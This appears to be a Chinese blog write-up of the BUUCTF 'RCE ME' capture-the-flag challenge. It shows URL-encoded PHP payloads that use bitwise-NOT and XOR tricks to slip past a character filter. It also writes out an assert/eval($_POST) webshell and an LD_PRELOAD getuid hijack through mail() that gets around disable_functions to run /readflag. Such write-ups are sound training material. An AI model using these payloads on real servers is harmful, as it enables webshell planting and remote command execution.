linux php -r,Linux中php命令起什么作用呢?_冬瓜Don的博客-CSDN博客
-r:运行PHP代码,而无需使用脚本标记“..?>”
浅谈PHP代码执行中出现过滤限制的绕过执行方法_末初mochu7的博客-CSDN博客_php代码执行绕过
BUUCTF:[极客大挑战 2019]RCE ME_末初mochu7的博客-CSDN博客
[极客大挑战 2019]RCE ME_浩歌已行的博客-CSDN博客
异或脚本参照_落夜雨的博客-CSDN博客_异或脚本
要求PHP>=7
php -r "echo urlencode(~'phpinfo');"
php5,php7 phpinfo();
php7 (phpinfo)();
?code=(~%8F%97%8F%96%91%99%90)();
禁用了system等函数,无法执行命令,用assert写马
assert
检查一个断言是否为false
assert()
会检查指定的assertion
并在结果为false
时采取适当的行动。在PHP5
或PHP7
中,如果assertion
是字符串,它将会被assert()
当做PHP
代码来执行。
php -r "echo urlencode(~'(eval($_POST["aaa"]))');"
php -r "echo urlencode(~'assert');"
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);
蚁剑连接
flag无读取权限,但是有readflag文件可以读取flag,还禁用了函数,这里无法执行readflag
0400为其他人的读权限 linux chmod命令参数及用法详解-文件文件夹权限设定命令_sswqzx的博客-CSDN博客_chmod 参数
字符:? ASCII码:63 二进制: 0011 1111
字符:~ ASCII码:126 二进制: 0111 1110
异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到 二进制: 0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A
去找了个php脚本来计算
payload:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%aa}();&%aa=phpinfo
// ${_GET}{%aa}();&%aa=phpinfo
//phpinfo();
写马
?code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%aa}(${%ff%ff%ff%ff^%a0%b8%ba%ab}{%bb});&%aa=assert&%bb=eval($_POST[a])
//assert(eval($_POST[a]));
蚁剑
打开插件市场下载就行
开始后就可以运行readfile文件了
劫持共享so,在启动子进程的时候,新的子进程会加载我们恶意的so拓展,然后我们可以在so里面定义同名函数,即可劫持API调用,成功RCE
一般而言,利用漏洞控制 web 启动新进程 a.bin(即便进程名无法让我随意指定),a.bin 内部调用系统函数 b(),b() 位于系统共享对象 c.so 中,所以系统为该进程加载共 c.so,想法在 c.so 前优先加载可控的 c_evil.so,c_evil.so 内含与 b() 同名的恶意函数,由于 c_evil.so 优先级较高,所以,a.bin 将调用到 c_evil.so 内 b() 而非系统的 c.so 内 b(),同时,c_evil.so 可控,达到执行恶意代码的目的。基于这一思路,常见突破 disable_functions 限制执行操作系统命令的方式为:
- 编写一个原型为 uid_t getuid(void); 的 C 函数,内部执行攻击者指定的代码,并编译成共享对象 getuid_shadow.so;
- 运行 PHP 函数 putenv(),设定环境变量 LD_PRELOAD 为 getuid_shadow.so,以便后续启动新进程时优先加载该共享对象;
- 运行 PHP 的 mail() 函数,mail() 内部启动新进程 /usr/sbin/sendmail,由于上一步 LD_PRELOAD 的作用,sendmail 调用的系统函数 getuid() 被优先级更好的 getuid_shadow.so 中的同名 getuid() 所劫持;
- 达到不调用 PHP 的各种命令执行函数(system()、exec() 等等)仍可执行系统命令的目的。
上传马和对象到/var/tmp
GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)
payload:
?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[%aa](${%fe%fe%fe%fe^%a1%b9%bb%aa}[%bb]);&%aa=assert&%bb=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so
//?code=assert(include('/var/tmp/bypass_disablefunc.php'));&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so